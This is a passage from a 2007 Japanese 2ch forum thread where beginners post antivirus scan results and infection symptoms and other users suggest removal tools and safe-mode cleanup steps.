154 :名無しさん@お腹いっぱい。:2007/01/12(金) 00:08:31
155 :名無しさん@お腹いっぱい。:2007/01/12(金) 00:45:59
初心者はやめとけとしか
むしろその手のソフトは自己責任
むしろその手のソフトは自己責任
156 :名無しさん@お腹いっぱい。:2007/01/12(金) 01:43:16
157 :名無しさん@お腹いっぱい。:2007/01/12(金) 07:23:36
>>156
>接続しようとすると強制終了してしまう
セキュリティソフトに問題ないなら再インストールor ad-awareにする
> 今一応Dr.WEBはあるんですが
それが駆除してくれないから入れたのでは?
>接続しようとすると強制終了してしまう
セキュリティソフトに問題ないなら再インストールor ad-awareにする
> 今一応Dr.WEBはあるんですが
それが駆除してくれないから入れたのでは?
158 :名無しさん@お腹いっぱい。:2007/01/12(金) 09:35:20
自分はインターネットを普段やっているのですが。
親のパソコンとは別に一階の部屋から電波を飛ばしたのを
キャッチして自分のノートパソコンでインターネットに
接続しています。
この場合に自分がウイルスに感染した場合に
親のパソコンに影響が出る事は考えられますか。
あったらどのようなものなのか教えていただけたいです。
自分のパソコンで対策ができていなくて
親のパソコンでできている場合はどうなりますかね?
親のパソコンとは別に一階の部屋から電波を飛ばしたのを
キャッチして自分のノートパソコンでインターネットに
接続しています。
この場合に自分がウイルスに感染した場合に
親のパソコンに影響が出る事は考えられますか。
あったらどのようなものなのか教えていただけたいです。
自分のパソコンで対策ができていなくて
親のパソコンでできている場合はどうなりますかね?
159 :困った素人:2007/01/12(金) 09:45:13
【使用OS】 WindowsXP SP2
【MicrosoftUpdate】 はい
【使用セキュリティソフト】Norton Internet Security
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
感染: Trojan-PSW.Win32.VB.hb スキップ
感染: Trojan-PSW.Win32.VB.hb スキップ
疑わしい: Exploit.HTML.Mht KLに送信
疑わしい: Exploit.HTML.Mht
【どんな症状が出るか】
明確な症状がないですが、最近重たくてネットサーフィンすると接続まで時間が掛かります。
【症状が出る前に何をやったか】
【その他の質問】検出されたウィルス等は、Norton Internet Security で検出されず、カスペルスキーのサイトでの無料検出スキャンの結果のものです。
他のサイトでの無料スキャンでも検出されず、カスペルスキーの無料スキャンのみで検出されました。
はたして、どちらの結果を信用してよいのでしょう?
素人質問ですいませんが、教えていただけたか幸いです。
【MicrosoftUpdate】 はい
【使用セキュリティソフト】Norton Internet Security
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
感染: Trojan-PSW.Win32.VB.hb スキップ
感染: Trojan-PSW.Win32.VB.hb スキップ
疑わしい: Exploit.HTML.Mht KLに送信
疑わしい: Exploit.HTML.Mht
【どんな症状が出るか】
明確な症状がないですが、最近重たくてネットサーフィンすると接続まで時間が掛かります。
【症状が出る前に何をやったか】
【その他の質問】検出されたウィルス等は、Norton Internet Security で検出されず、カスペルスキーのサイトでの無料検出スキャンの結果のものです。
他のサイトでの無料スキャンでも検出されず、カスペルスキーの無料スキャンのみで検出されました。
はたして、どちらの結果を信用してよいのでしょう?
素人質問ですいませんが、教えていただけたか幸いです。
160 :名無しさん@お腹いっぱい。:2007/01/12(金) 11:26:05
昨日、>>128で質問させてもらった者です。
その後色々と調べてみたんですが、どうやらコレの様です。
http://www.symantec.com/region/jp/avcenter/venc/data/[email protected]
で、今の段階では「ACCOUNT ALERT」なるメールが送信されてきて、
その本文に含まれているリンクをクリックさせようとしているのですが、
さすがにクリックはしていないんです。
ですのでノートンが実際に反応した訳でもなく、今の段階ではレジストリを改変された訳でもない様です。
お騒がせいたしました。
その後色々と調べてみたんですが、どうやらコレの様です。
http://www.symantec.com/region/jp/avcenter/venc/data/[email protected]
で、今の段階では「ACCOUNT ALERT」なるメールが送信されてきて、
その本文に含まれているリンクをクリックさせようとしているのですが、
さすがにクリックはしていないんです。
ですのでノートンが実際に反応した訳でもなく、今の段階ではレジストリを改変された訳でもない様です。
お騒がせいたしました。
161 :名無しさん@お腹いっぱい。:2007/01/12(金) 13:02:37
162 :名無しさん@お腹いっぱい。:2007/01/12(金) 13:06:16
age
163 :困った素人:2007/01/12(金) 13:10:08
>>161
Ad-Aware SE Personslでは検出されませんでした。
Ad-Aware SE Personslでは検出されませんでした。
164 :名無しさん@お腹いっぱい。:2007/01/12(金) 13:15:33
>>163
Ad-Awareが優秀とは限らない
Ad-Awareが優秀とは限らない
165 :名無しさん@お腹いっぱい。:2007/01/12(金) 14:18:45
>>164
そんな事言ってたら、どんな対策ソフトも優秀とは限らない
そんな事言ってたら、どんな対策ソフトも優秀とは限らない
166 :158:2007/01/12(金) 14:51:49
>>161レスありがとうございます!!
共有フォルダやファイル とはどういったものをさすのかがわかりません・・
自分はインターネット以外でパソコンを使っていないんですけど
共有フォルダやファイルをもっているということは
あるんでしょうか?
共有フォルダやファイル とはどういったものをさすのかがわかりません・・
自分はインターネット以外でパソコンを使っていないんですけど
共有フォルダやファイルをもっているということは
あるんでしょうか?
167 :名無しさん@お腹いっぱい。:2007/01/12(金) 14:57:43
168 :名無しさん@お腹いっぱい。:2007/01/12(金) 14:58:51
>>166
普通は設定しない限り無いのでは?
普通は設定しない限り無いのでは?
169 :>>123:2007/01/12(金) 15:09:08
>>127
ありがとうございます!
無料スキャンしたところ、疑わしいのが12個、感染してるのが1個見つかりました・・・
疑わしいファイルはいずれも2ちゃんねるの壺のログの中から見つかったのですが、
これってどういうことなんでしょうかね・・
感染していたということなのでしょうか
一応12個とも手動で削除しましたが・・
あと感染していると出たプログラムが何とウイルスバスター2006なんです(゜д゜;)
どうすれば・・プログラムごと削除したらいいんでしょうか
いつの間に感染したんだろう・・
C¥Program Files¥TrendMicro¥VirusBuster2006¥26.tmpと出たのですが
どなたか教えてください お願いします・・
ありがとうございます!
無料スキャンしたところ、疑わしいのが12個、感染してるのが1個見つかりました・・・
疑わしいファイルはいずれも2ちゃんねるの壺のログの中から見つかったのですが、
これってどういうことなんでしょうかね・・
感染していたということなのでしょうか
一応12個とも手動で削除しましたが・・
あと感染していると出たプログラムが何とウイルスバスター2006なんです(゜д゜;)
どうすれば・・プログラムごと削除したらいいんでしょうか
いつの間に感染したんだろう・・
C¥Program Files¥TrendMicro¥VirusBuster2006¥26.tmpと出たのですが
どなたか教えてください お願いします・・
170 :名無しさん@お腹いっぱい。:2007/01/12(金) 15:31:01
壮大な釣りだったのか?
171 :名無しさん@お腹いっぱい。:2007/01/12(金) 16:14:19
ウィルスやスパイウェアのデメリットは駆除する時間がめんどくさいだけでしょうか?
ウィルスやスパイウェアにかかったときに困る事は他にありますか?
ウィルスやスパイウェアにかかったときに困る事は他にありますか?
172 :名無しさん@お腹いっぱい。:2007/01/12(金) 16:26:51
ファイアーウォールソフトが、マザーボードについてきたノートンをインストールして再起動した直後に
ccApp-Client and Host Security Platform
このアプリケーションがネットワークへのアクセスを試みていると警告出してきました。
これはノートンのだから許可していいんですか?
ccApp-Client and Host Security Platform
このアプリケーションがネットワークへのアクセスを試みていると警告出してきました。
これはノートンのだから許可していいんですか?
173 : ◆N9P3SuvBPo :2007/01/12(金) 18:29:40
>169
>2ちゃんねるの壺のログの中
これか?=Exploit.HTML.Mht
いわゆるノートントラップって奴だ。
2chブラウザのログから検出されることはこれからもあるかもしれないが、
感染はしないから安心しろ。
そして
>C¥Program Files¥TrendMicro¥VirusBuster2006¥26.tmp
こちらは何と言う名前で検出された?
>2ちゃんねるの壺のログの中
これか?=Exploit.HTML.Mht
いわゆるノートントラップって奴だ。
2chブラウザのログから検出されることはこれからもあるかもしれないが、
感染はしないから安心しろ。
そして
>C¥Program Files¥TrendMicro¥VirusBuster2006¥26.tmp
こちらは何と言う名前で検出された?
174 :名無しさん@お腹いっぱい。:2007/01/12(金) 18:47:46
¥QUARANTINEの悪寒
175 :>>123:2007/01/12(金) 19:15:39
>>173
本当にありがとうございます!
名前はわからないですけど>>174さんの言ってるとこです・・・
言わなくてもわかるってことは相当ヤバイんですかね・・
あとウイルスバスターの感染はどうしたら・・
本当にありがとうございます!
名前はわからないですけど>>174さんの言ってるとこです・・・
言わなくてもわかるってことは相当ヤバイんですかね・・
あとウイルスバスターの感染はどうしたら・・
176 :名無しさん@お腹いっぱい。:2007/01/12(金) 19:19:30
tp://satoumizu.net/
ここ見ようとしたらAVGが反応したんですが大丈夫でしょうか?
VBS/Reldrofってウィルスみたいです。
ここ見ようとしたらAVGが反応したんですが大丈夫でしょうか?
VBS/Reldrofってウィルスみたいです。
177 :名無しさん@お腹いっぱい。:2007/01/12(金) 19:24:24
r;ァ'N;:::::::::::::,ィ/ >::::::::::ヽ
. 〃 ヽル1'´ ∠:::::::::::::::::i
i′ ___, - ,. = -一  ̄l:::::::::::::::l
. ! , -==、´r' l::::::/,ニ.ヽ
l _,, -‐''二ゝ l::::l f゙ヽ |、 どんなウイルスよりも、
レー-- 、ヽヾニ-ァ,ニ;=、_ !:::l ) } ト
ヾ¨'7"ry、` ー゙='ニ,,,` }::ヽ(ノ 2ch閉鎖の方が恐ろしい。
:ーゝヽ、 !´ " ̄ 'l,;;;;,,,.、 ,i:::::::ミ
::::::::::::::::ヽ.-‐ ト、 r'_{ __)`ニゝ、 ,,iリ::::::::ミ
::::::::::::::::::::Vi/l:::V'´;ッ`ニ´ー-ッ-,、:::::`"::::::::::::::;゙ ,
:::::::::::::::::::::::::N. ゙、::::ヾ,.`二ニ´∠,,.i::::::::::::::::::::///
:::::::::::::::::::::::::::::l ヽ;:::::::::::::::::::::::::::::::::::::::::::/ /
::::::::::::::::::::::::::::::! :|.\;::::::::::::::::::::::::::::::/ /
. 〃 ヽル1'´ ∠:::::::::::::::::i
i′ ___, - ,. = -一  ̄l:::::::::::::::l
. ! , -==、´r' l::::::/,ニ.ヽ
l _,, -‐''二ゝ l::::l f゙ヽ |、 どんなウイルスよりも、
レー-- 、ヽヾニ-ァ,ニ;=、_ !:::l ) } ト
ヾ¨'7"ry、` ー゙='ニ,,,` }::ヽ(ノ 2ch閉鎖の方が恐ろしい。
:ーゝヽ、 !´ " ̄ 'l,;;;;,,,.、 ,i:::::::ミ
::::::::::::::::ヽ.-‐ ト、 r'_{ __)`ニゝ、 ,,iリ::::::::ミ
::::::::::::::::::::Vi/l:::V'´;ッ`ニ´ー-ッ-,、:::::`"::::::::::::::;゙ ,
:::::::::::::::::::::::::N. ゙、::::ヾ,.`二ニ´∠,,.i::::::::::::::::::::///
:::::::::::::::::::::::::::::l ヽ;:::::::::::::::::::::::::::::::::::::::::::/ /
::::::::::::::::::::::::::::::! :|.\;::::::::::::::::::::::::::::::/ /
178 :名無しさん@お腹いっぱい。:2007/01/12(金) 19:25:39
179 :>>123:2007/01/12(金) 19:58:41
本当ですか!?
カスペルスキー・・?(゜д゜)
検出した26.tmpも削除しとかなくていいんですか?
カスペルスキー・・?(゜д゜)
検出した26.tmpも削除しとかなくていいんですか?
180 :名無しさん@お腹いっぱい。:2007/01/12(金) 20:05:41
>>179
あれ カスペルスキーオンラインスキャンやったんじゃなかったの? 違うオンラインスキャン?
どっちにしろ バスターが既に隔離してるからそのままでもいいけど
気になるんなら隔離されたやつを完全に削除すればもうでてこないよ
俺はバスターユーザーじゃないからやりかたはオンラインヘルプでも読んでクレ
あれ カスペルスキーオンラインスキャンやったんじゃなかったの? 違うオンラインスキャン?
どっちにしろ バスターが既に隔離してるからそのままでもいいけど
気になるんなら隔離されたやつを完全に削除すればもうでてこないよ
俺はバスターユーザーじゃないからやりかたはオンラインヘルプでも読んでクレ
181 :>>123:2007/01/12(金) 20:23:10
あ、そうでした・・すみませんぼけてましたorz
教えてくれてありがとうございます
結局なんてウイルスか、どんな作用をしたのかはわからないままですね・・
今は隔離されてるとわかって一安心ですが、感染してたってことはもう手遅れ・・(´・ω・`)
個人情報バラまいたりされてないかすごく不安です・・
教えてくれてありがとうございます
結局なんてウイルスか、どんな作用をしたのかはわからないままですね・・
今は隔離されてるとわかって一安心ですが、感染してたってことはもう手遅れ・・(´・ω・`)
個人情報バラまいたりされてないかすごく不安です・・
182 :名無しさん@お腹いっぱい。:2007/01/12(金) 20:40:40
>>181
いや あのね
隔離フォルダからしか検出されてないってことは感染前にバスターが自動的に隔離してくれたってこと
そういう状態は感染とはいわず保菌という状態に近い
なんてウイルスかはバスターのウイルスログにウイルス名が書いてあるからググルなりして調べんさい
てか 俺つられた?
いや あのね
隔離フォルダからしか検出されてないってことは感染前にバスターが自動的に隔離してくれたってこと
そういう状態は感染とはいわず保菌という状態に近い
なんてウイルスかはバスターのウイルスログにウイルス名が書いてあるからググルなりして調べんさい
てか 俺つられた?
183 : ◆N9P3SuvBPo :2007/01/12(金) 21:18:59
それよりも昨日のもう一人の質問者の行方が気になるところだ…
>>181
よく考えたら感染してないとは言い切れないね
単独で活動するやつで感染後にバスターのupdateで対応された新種とか
ネタかもしれんけど ウイルス名でぐぐって挙動を確認してその症状があったか確認するしかないね
ほんじゃ
よく考えたら感染してないとは言い切れないね
単独で活動するやつで感染後にバスターのupdateで対応された新種とか
ネタかもしれんけど ウイルス名でぐぐって挙動を確認してその症状があったか確認するしかないね
ほんじゃ
185 :名無しさん@お腹いっぱい。:2007/01/12(金) 23:30:54
ウィルスを保存しておいて後々必要となった時に戻せる様にしてあるだけじゃない?
(誤検出しても所定の操作でもとの場所にファイルを戻せるから)
(誤検出しても所定の操作でもとの場所にファイルを戻せるから)
186 :>>123:2007/01/13(土) 01:28:55
遅くなってすみません・・ いろいろありがとうございます
バスターの隔離ってとこを見てみたら eicar[1].comって・・
どんなウイルスかを調べてみたら・・テストファイルって・・
どういうことなんでしょう
感染した時間を見ても多分このウイルスだと思うのですが・・
バスターの隔離ってとこを見てみたら eicar[1].comって・・
どんなウイルスかを調べてみたら・・テストファイルって・・
どういうことなんでしょう
感染した時間を見ても多分このウイルスだと思うのですが・・
187 :名無しさん@お腹いっぱい。:2007/01/13(土) 09:23:44
いい加減ググれ
188 :名無しさん@お腹いっぱい。:2007/01/13(土) 09:31:39
>>186
ttp://www.google.com/search?hl=ja&q=eicar%5B1%5D%2Ecom&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja
ttp://www.google.com/search?hl=ja&q=eicar%5B1%5D%2Ecom&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja
189 :名無しさん@お腹いっぱい。:2007/01/13(土) 12:52:15
早く休みおわんねーかなぁ・・・
190 :名無しさん@お腹いっぱい。:2007/01/13(土) 20:45:35
ノートン2006の中古がヤフオクに出ていますが
既に使用済み(アクティブ化済)のものが含まれています。
使えないのになぜ買うのでしょうか?
既に使用済み(アクティブ化済)のものが含まれています。
使えないのになぜ買うのでしょうか?
191 :名無しさん@お腹いっぱい。:2007/01/13(土) 21:40:34
どなたか、デスクトップにドクロマークが出るウイルスの対処方法をご存知ありませんか?携帯しか使えずに困っています。
192 :名無しさん@お腹いっぱい。:2007/01/13(土) 21:56:58
リカバリ
193 :名無しさん@お腹いっぱい。:2007/01/13(土) 22:16:50
>>190
セキュリティ初心者質問スレッドpart80
http://pc10.2ch.net/test/read.cgi/sec/1167252179/432
432 名前:名無しさん@お腹いっぱい。[] 投稿日:2007/01/13(土) 21:06:44
ノートン2006の中古がヤフオクに出ていますが
既に使用済み(アクティブ化済)のものが含まれています。
使えないのになぜ買うのでしょうか?
セキュリティ初心者質問スレッドpart80
http://pc10.2ch.net/test/read.cgi/sec/1167252179/432
432 名前:名無しさん@お腹いっぱい。[] 投稿日:2007/01/13(土) 21:06:44
ノートン2006の中古がヤフオクに出ていますが
既に使用済み(アクティブ化済)のものが含まれています。
使えないのになぜ買うのでしょうか?
194 :名無しさん@お腹いっぱい。:2007/01/13(土) 22:17:26
>>190
売ってるから?欲しいから?
売ってるから?欲しいから?
195 : ◆N9P3SuvBPo :2007/01/13(土) 22:33:43
>191
またかよ
セーフモードで起動
↓
Alt+F4連打していればそのうち起動できる
とりあえずここまで
またかよ
セーフモードで起動
↓
Alt+F4連打していればそのうち起動できる
とりあえずここまで
196 :名無しさん@お腹いっぱい。:2007/01/14(日) 01:47:29
197 :名無しさん@お腹いっぱい。:2007/01/14(日) 03:28:16
198 :名無しさん@お腹いっぱい。:2007/01/14(日) 03:29:30
変なソフトをインストールしようとしたり、ポップアップ広告を出してきたり、詐欺サイト(多分)を表示します
何度消そうとしてもなかなか消えません。非常にしつこいです。
最新のパターンファイルに更新したウィルス対策ソフトを使っても検出されません(ノートン、ウィルスバスターオンラインスキャン)
また、スパイウェア対策ソフトでも同様です(Spybot Adaware se)
【使用OS】XP Home SP1
【MicrosoftUpdate】 常に最新のものに更新しています
【使用セキュリティソフト】 ノートン インターネットセキュリティ 2007
【セキュリティソフトの定義ファイルは最新の状態であるか】 常に最新の状態に更新しています
【ルータの有無】 あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】Dialer. Traffic advance
【どんな症状が出るか】 IEを立ち上げると英語のメッセージで「ウィルスに犯されています」
みたいなメッセージが表示されて「キャンセル」を押しても詐欺サイトのHPを開く
その他、変なソフトをインストールしようとしてきて、「いいえ」を選んでも何度も繰り返す
【症状が出る前に何をやったか】 画像掲示板で番号をずらしながら表示したらウィルスにひっかかった
【症状を解決しようとどのような処置を取ったか】感染した時に何もウィルス対策ソフトを入れてなかったので導入した
また、導入するまではオンラインウィルススキャンで手動で感染ファイルを削除
ちょっと前からは激しい症状が出る時はノートンが反応するようになったけど、基本的には反応しません
なお、IEを使用してない状態では何も症状は出ないようです。
IEを立ち上げる時に時間がかかり、一瞬ウィンドウが非アクティブの状態になります。
どうかよろしくお願いします
何度消そうとしてもなかなか消えません。非常にしつこいです。
最新のパターンファイルに更新したウィルス対策ソフトを使っても検出されません(ノートン、ウィルスバスターオンラインスキャン)
また、スパイウェア対策ソフトでも同様です(Spybot Adaware se)
【使用OS】XP Home SP1
【MicrosoftUpdate】 常に最新のものに更新しています
【使用セキュリティソフト】 ノートン インターネットセキュリティ 2007
【セキュリティソフトの定義ファイルは最新の状態であるか】 常に最新の状態に更新しています
【ルータの有無】 あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】Dialer. Traffic advance
【どんな症状が出るか】 IEを立ち上げると英語のメッセージで「ウィルスに犯されています」
みたいなメッセージが表示されて「キャンセル」を押しても詐欺サイトのHPを開く
その他、変なソフトをインストールしようとしてきて、「いいえ」を選んでも何度も繰り返す
【症状が出る前に何をやったか】 画像掲示板で番号をずらしながら表示したらウィルスにひっかかった
【症状を解決しようとどのような処置を取ったか】感染した時に何もウィルス対策ソフトを入れてなかったので導入した
また、導入するまではオンラインウィルススキャンで手動で感染ファイルを削除
ちょっと前からは激しい症状が出る時はノートンが反応するようになったけど、基本的には反応しません
なお、IEを使用してない状態では何も症状は出ないようです。
IEを立ち上げる時に時間がかかり、一瞬ウィンドウが非アクティブの状態になります。
どうかよろしくお願いします
199 :名無しさん@お腹いっぱい。:2007/01/14(日) 04:48:45
>>198
俺もつい先程まで多分それと同じ症状が出た。
SpybotとAdawareでも駆除は無理だったけど、↓これ導入したら駆除できたよ。
「SUPERAntiSpyware」
ttp://www.superantispyware.com/
俺もつい先程まで多分それと同じ症状が出た。
SpybotとAdawareでも駆除は無理だったけど、↓これ導入したら駆除できたよ。
「SUPERAntiSpyware」
ttp://www.superantispyware.com/
200 :名無しさん@お腹いっぱい。:2007/01/14(日) 04:58:53
>199
ぐぐったらなんか凄そうなものですね。
一度試してみたい。
ぐぐったらなんか凄そうなものですね。
一度試してみたい。
201 :名無しさん@お腹いっぱい。:2007/01/14(日) 08:08:04
>>198
セキュリティインスペクタしてなかったの?
セキュリティインスペクタしてなかったの?
202 :名無しさん@お腹いっぱい。:2007/01/14(日) 12:13:03
>>199
本体がトロジャンって認識されるってw
本体がトロジャンって認識されるってw
203 : ◆N9P3SuvBPo :2007/01/14(日) 18:37:41
>198
SmitFraudFix使ったほうがいいかな。
SmitFraudFix使ったほうがいいかな。
204 : ◆N9P3SuvBPo :2007/01/14(日) 19:12:06
しかし、感染してからセキュリティソフトを入れても無意味に等しいからな…
205 :名無しさん@お腹いっぱい。:2007/01/14(日) 19:36:26
>>201 203 204
自己解決しますた
カスペルスキーのオンラインスキャンで感染ファイルを検出
以前感染した際に手動で削除しようとしてできなかった感染ファイルを検出
セーフモードで削除しますた
で、以前のように快適にネットができてます
これからは気をつけなくては‥
自己解決しますた
カスペルスキーのオンラインスキャンで感染ファイルを検出
以前感染した際に手動で削除しようとしてできなかった感染ファイルを検出
セーフモードで削除しますた
で、以前のように快適にネットができてます
これからは気をつけなくては‥
206 :名無しさん@お腹いっぱい。:2007/01/14(日) 19:42:03
207 :名無しさん@お腹いっぱい。:2007/01/15(月) 03:12:23
【使用OS】 WindowsXP SP1
【MicrosoftUpdate】 最新です
【使用セキュリティソフト】 WinFixer 2006
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です
【ルータの有無】 有ります
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
Cookieと言われるウイルスが1件のみ
【どんな症状が出るか】 PCが非常に重たくなり、通常の作業に支障が出る
【症状が出る前に何をやったか】 WinFixer 2006をインストール
【症状を解決しようとどのような処置を取ったか】
F-Secure InternetSecurity 2006を消してWinFixer 2006を入れた
【その他の質問】最強のソフトで軽いという謳い文句でサイトに書いてあったのに、
こんなにPCが重くなるなんて考えられません。
メモリは2G積んでいます。
どうしたらいいのか何も分からないまま、WinFixer 2006を購入しました。
【MicrosoftUpdate】 最新です
【使用セキュリティソフト】 WinFixer 2006
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です
【ルータの有無】 有ります
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
Cookieと言われるウイルスが1件のみ
【どんな症状が出るか】 PCが非常に重たくなり、通常の作業に支障が出る
【症状が出る前に何をやったか】 WinFixer 2006をインストール
【症状を解決しようとどのような処置を取ったか】
F-Secure InternetSecurity 2006を消してWinFixer 2006を入れた
【その他の質問】最強のソフトで軽いという謳い文句でサイトに書いてあったのに、
こんなにPCが重くなるなんて考えられません。
メモリは2G積んでいます。
どうしたらいいのか何も分からないまま、WinFixer 2006を購入しました。
208 :名無しさん@お腹いっぱい。:2007/01/15(月) 04:32:45
209 :名無しさん@お腹いっぱい。:2007/01/15(月) 15:27:20
,. -‐v―- 、
ヽ
/ //_/ノハL!L!i
r‐、 i 彡 .i ,-ァ
ヽ ヽ!_ 彡 fて) fて) .Y -く
[i 6 ●( ヽ ^ __,. ●ト、/ <喰っても不死家から黙って喰え。
. ト-' 、 `  ̄ ̄ .ノ
> ___ <_
/ヾ ヽ ヾ ヽ\
/ | ◯ ̄ ̄ ◯ |/ヽ
ヽ
/ //_/ノハL!L!i
r‐、 i 彡 .i ,-ァ
ヽ ヽ!_ 彡 fて) fて) .Y -く
[i 6 ●( ヽ ^ __,. ●ト、/ <喰っても不死家から黙って喰え。
. ト-' 、 `  ̄ ̄ .ノ
> ___ <_
/ヾ ヽ ヾ ヽ\
/ | ◯ ̄ ̄ ◯ |/ヽ
210 :名無しさん@お腹いっぱい。:2007/01/15(月) 20:37:45
今スパイウェアを駆除しようと友達のPCからSpybotをダウンロードしてきたんですが
インストールしてスキャンしたらなぜかエラー(You need install…)がでてきてスキャンができないのですがどうすればいいでしょうか?
インストールしてスキャンしたらなぜかエラー(You need install…)がでてきてスキャンができないのですがどうすればいいでしょうか?
211 : ◆N9P3SuvBPo :2007/01/15(月) 21:30:46
>210
正しくはSpybot-S&Dな。(Spybotでも通じるから良いけどw)
そもそも、Spybotは感染を予防するために入れるんだぞ。
Spybotだけじゃなくて、セキュリティソフト全般にも言えることだけど。
セーフモードで起動してやってみろ。
正しくはSpybot-S&Dな。(Spybotでも通じるから良いけどw)
そもそも、Spybotは感染を予防するために入れるんだぞ。
Spybotだけじゃなくて、セキュリティソフト全般にも言えることだけど。
セーフモードで起動してやってみろ。
212 : ◆N9P3SuvBPo :2007/01/16(火) 17:57:18
この前の質問者、何の音沙汰も無しというのが気になるんだが。
213 :名無しさん@お腹いっぱい。:2007/01/16(火) 18:40:49
214 : ◆N9P3SuvBPo :2007/01/16(火) 19:16:01
>213
だと良いんですがね。
>141-142、>147
で、>142の最後の行に症状がどうなったか報告してほしいと書いてあるのに、
何故か返事が無いんですよね。
もしかしたら、自分の指示がどこか間違っていて何らかの不具合が起きて
しまっているのでは?と思っているんですが。
だと良いんですがね。
>141-142、>147
で、>142の最後の行に症状がどうなったか報告してほしいと書いてあるのに、
何故か返事が無いんですよね。
もしかしたら、自分の指示がどこか間違っていて何らかの不具合が起きて
しまっているのでは?と思っているんですが。
215 :名無しさん@お腹いっぱい。:2007/01/16(火) 19:52:21
ウィルスバスター2007でスパイウェア検索をしたところ
TSPY_WINNYというのが発見されました
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FWINNY
感染していた .exe .dllなどのファイルを削除したうえで
スパイウェア・ウィルス検索を実行し、特に何も検出されませんでした
感染したアプリケーション.exeを実行した可能性がありますが
is disguised as an application that aids spyware's installation
スパイウェアのインストールを支援するアプリケーションと偽ります?
何をされるの?
TSPY_・・・ は情報漏洩やらするやつらのことみたいだけど。
(トロイの木馬4台目はたたないの?)
TSPY_WINNYというのが発見されました
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FWINNY
感染していた .exe .dllなどのファイルを削除したうえで
スパイウェア・ウィルス検索を実行し、特に何も検出されませんでした
感染したアプリケーション.exeを実行した可能性がありますが
is disguised as an application that aids spyware's installation
スパイウェアのインストールを支援するアプリケーションと偽ります?
何をされるの?
TSPY_・・・ は情報漏洩やらするやつらのことみたいだけど。
(トロイの木馬4台目はたたないの?)
>>214
逆に理解不能だったかも。(藁
ともあれ自分もよくROMらせて頂いて
おりますが大変勉強になります。
(おかげでかなり助かっております)
(ノートンで以前困った【別スレ】)
あんまり気にしなさんなって(・ω・)ノ、しかし
セキュリティ板は回答する方が難しいねw
俺から言わしたら、複合的な要因大杉です
「リカバリしろ!」と一言でなんてめったに言えた
もんじゃないですから。。。
この板の真意はやはり高度なテンプレに
意味があるんだと思います。実際ウィルス
に感染しなきゃわからない事だらけですから。もちろん感染しない事に、こしたことは
ないです。
逆に理解不能だったかも。(藁
ともあれ自分もよくROMらせて頂いて
おりますが大変勉強になります。
(おかげでかなり助かっております)
(ノートンで以前困った【別スレ】)
あんまり気にしなさんなって(・ω・)ノ、しかし
セキュリティ板は回答する方が難しいねw
俺から言わしたら、複合的な要因大杉です
「リカバリしろ!」と一言でなんてめったに言えた
もんじゃないですから。。。
この板の真意はやはり高度なテンプレに
意味があるんだと思います。実際ウィルス
に感染しなきゃわからない事だらけですから。もちろん感染しない事に、こしたことは
ないです。
217 : ◆N9P3SuvBPo :2007/01/16(火) 20:53:31
>216
慰めの言葉ありがとうございます。
このスレのテンプレは前スレで、俺が作ったものです。
まだ修正・追記箇所がありますが、あまり複雑にし過ぎると、
今度は質問する側が参ってしまうかもしれないので。
ちなみに「リカバリしろ!」は言う時だってありますよ。
慰めの言葉ありがとうございます。
このスレのテンプレは前スレで、俺が作ったものです。
まだ修正・追記箇所がありますが、あまり複雑にし過ぎると、
今度は質問する側が参ってしまうかもしれないので。
ちなみに「リカバリしろ!」は言う時だってありますよ。
218 :210:2007/01/16(火) 23:50:04
返答しなくて本当にすいませんでした。
今は携帯からしかできないし、直ってから報告しようと思っていたのです
実はまだセーフモードで起動してからスキャンしても同じ結果になってしまうのですがどうすればいいのでしょう?
今は携帯からしかできないし、直ってから報告しようと思っていたのです
実はまだセーフモードで起動してからスキャンしても同じ結果になってしまうのですがどうすればいいのでしょう?
219 : ◆N9P3SuvBPo :2007/01/17(水) 00:10:10
>218
セーフモードでもダメなら…んん?
でもなんでSpybotを使おうと思ったの?
セーフモードでもダメなら…んん?
でもなんでSpybotを使おうと思ったの?
220 :名無しさん@お腹いっぱい。:2007/01/17(水) 01:24:38
>今スパイウェアを駆除しようと友達のPCからSpybotをダウンロードしてきたんですが
ここの経緯とかインスコ方法に問題がありそうな気がするが
ここの経緯とかインスコ方法に問題がありそうな気がするが
221 :名無しさん@お腹いっぱい。:2007/01/17(水) 02:57:59
>>220あるあるw
>>218 “210”さんもう一回基本確認してみて!
↓spybotS&Dテンプレから引用
(レジストリに何らかの改変が加わってていた場合手遅れかも試練)
■最初にすること(遅いがね
Spybot、SpywareBlasterを(必要に応じて CustomBlocking Updater も)インストール
↓
インターネットのキャッシュファイルを(問題が無ければクッキーも一緒に)クリアして、ブラウザを閉じる
↓
SpywareBlaster定義ファイル&日本語Dialerリストのアップデート
↓
Spybot定義ファイルアップデート・免疫化
↓
ファイル設定→全てにチェックを入れる
↓
Spybotでスキャン・駆除
↓
セーフモードから再びSpybotでスキャン・駆除
↓
(゚д゚)ウマー
>>218 “210”さんもう一回基本確認してみて!
↓spybotS&Dテンプレから引用
(レジストリに何らかの改変が加わってていた場合手遅れかも試練)
■最初にすること(遅いがね
Spybot、SpywareBlasterを(必要に応じて CustomBlocking Updater も)インストール
↓
インターネットのキャッシュファイルを(問題が無ければクッキーも一緒に)クリアして、ブラウザを閉じる
↓
SpywareBlaster定義ファイル&日本語Dialerリストのアップデート
↓
Spybot定義ファイルアップデート・免疫化
↓
ファイル設定→全てにチェックを入れる
↓
Spybotでスキャン・駆除
↓
セーフモードから再びSpybotでスキャン・駆除
↓
(゚д゚)ウマー
222 :名無しさん@お腹いっぱい。:2007/01/17(水) 03:00:16
■次からすること
インターネットのキャッシュファイルを(問題が無ければクッキーも一緒に)クリアして、ブラウザを閉じる
↓
SpywareBlaster定義ファイル&日本語Dialerリストのアップデート
↓
